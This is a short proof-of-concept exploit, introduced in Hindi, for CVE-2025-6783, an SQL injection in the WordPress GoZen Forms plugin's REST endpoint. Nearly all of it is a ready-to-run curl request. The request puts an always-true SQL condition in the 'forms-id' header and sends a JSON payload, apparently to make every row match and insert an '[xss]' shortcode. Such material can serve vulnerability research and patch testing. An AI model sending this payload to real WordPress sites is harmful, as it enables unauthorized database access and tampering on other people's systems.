
CVE-2025-6783 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो WordPress GoZen Forms REST API एंडपॉइंट के विरुद्ध तैयार किए गए HTTP हेडर और JSON पेलोड के माध्यम से SQL इंजेक्शन का प्रदर्शन करता है।
WHERE क्लॉज़ में एक हमेशा-सत्य शर्त इंजेक्ट करें ताकि हर पंक्ति मेल खाए:
curl -i -X POST \
-H "Content-Type: application/json" \
-H "forms-id: poc-001' OR '1'='1' -- " \
-H "domain-id: example.com" \
-d '{
"emabed_type":"iframe",
"shortcode_title":"INJECTED",
"shortcode_tag":"[xss]",
"active":0
}' \
"http://your-site.com/index.php?rest_route=/gozen-forms/v1/embedsc"